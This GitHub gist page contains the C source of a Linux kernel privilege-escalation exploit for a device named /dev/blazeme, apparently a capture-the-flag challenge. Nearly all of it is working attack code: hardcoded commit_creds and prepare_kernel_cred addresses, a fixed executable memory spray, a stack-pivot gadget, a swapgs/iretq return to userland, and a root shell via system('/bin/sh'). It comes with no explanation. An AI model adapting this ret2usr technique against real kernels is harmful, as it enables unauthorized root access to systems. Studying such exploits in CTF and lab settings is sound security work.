Last active
December 7, 2019 03:42
-
-
Save fatalbit/2b5c04ed8f98b749dd7765ea4cd930e7 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <unistd.h> | |
#include <fcntl.h> | |
#include <stdint.h> | |
#include <stdlib.h> | |
#include <stdio.h> | |
#include <sys/mman.h> | |
int __attribute__((regparm(3))) (*commit_creds)(unsigned long cred) = 0xffffffff81063960; | |
unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred) = 0xffffffff81063b50; | |
void trap_return(); | |
void escalate_privs() { | |
commit_creds(prepare_kernel_cred(0)); | |
trap_return(); | |
} | |
unsigned long user_cs; | |
unsigned long user_ss; | |
unsigned long user_rflags; | |
unsigned long saved_sp; | |
void shell(); | |
void save_segments() { | |
asm volatile( | |
"movq %%cs, %0\n" | |
"movq %%ss, %1\n" | |
"pushfq\n" | |
"popq %2\n" | |
"pushq %%rsp\n" | |
"popq %3\n" | |
: "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags), "=r"(saved_sp) | |
: | |
: "memory"); | |
} | |
void trap_return() { | |
asm volatile( | |
"swapgs ;" | |
"movq %0, 0x20(%%rsp)\t\n" | |
"movq %1, 0x18(%%rsp)\t\n" | |
"movq %2, 0x10(%%rsp)\t\n" | |
"movq %3, 0x08(%%rsp)\t\n" | |
"movq %4, 0x00(%%rsp)\t\n" | |
"iretq" | |
: | |
: "r"(user_ss), "r"(saved_sp), "r"(user_rflags), "r"(user_cs), "r"(shell)); | |
} | |
void shell() { | |
printf("Starting shell\n"); | |
system("/bin/sh"); | |
} | |
int main() { | |
int fd; | |
fd = open("/dev/blazeme", O_RDWR); | |
if (fd < 0) { | |
return -1; | |
} | |
const size_t BUF_SIZE = 64; | |
uint8_t payload[BUF_SIZE]; | |
payload[0] = 0x42; | |
payload[1] = 0x42; | |
uint64_t* ptr = (uint64_t*)&payload[2]; | |
/* Align to pointer boundary with 'Hello ' prefix */ | |
size_t idx = 2; | |
/* mmap a non alpha numeric memory addr*/ | |
const size_t MAP_SIZE = 0x2000; | |
/* Map a page ahead to account for oopsing on sub esp instructions after the | |
* pivot */ | |
void* addr = mmap((void*)0x173f000, MAP_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, | |
MAP_FIXED | MAP_ANON | MAP_PRIVATE , -1, 0); | |
if (addr == MAP_FAILED) { | |
printf("map failed\n"); | |
return -1; | |
} | |
for (size_t i = 0; i < (MAP_SIZE / sizeof(unsigned long)); ++i) { | |
((unsigned long*)addr)[i] = (unsigned long)&escalate_privs; | |
} | |
printf("Addr mapped is %p\n", addr); | |
for (; idx < BUF_SIZE;) { | |
*ptr = 0xffffffff8109c604; | |
ptr++; | |
idx += 8; | |
} | |
for (; idx < BUF_SIZE; ++idx) { | |
payload[idx] = 0x41; | |
} | |
/* Stack buffer is 512 so we need to just keep sending | |
* until our spray aligns. */ | |
printf("Saving segments\n"); | |
save_segments(); | |
printf("Sending payload, attempting to return to %p\n", &escalate_privs); | |
for (size_t i = 0; i < 100; ++i) { | |
write(fd, payload, sizeof(payload)); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment